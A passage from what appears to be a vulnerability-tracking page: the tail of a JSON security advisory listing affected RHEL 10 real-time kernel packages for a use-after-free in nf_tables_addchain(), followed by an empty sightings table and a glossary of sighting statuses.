"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: kernel: Privilege escalation or denial of service via use-after-free in nf_tables_addchain()"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.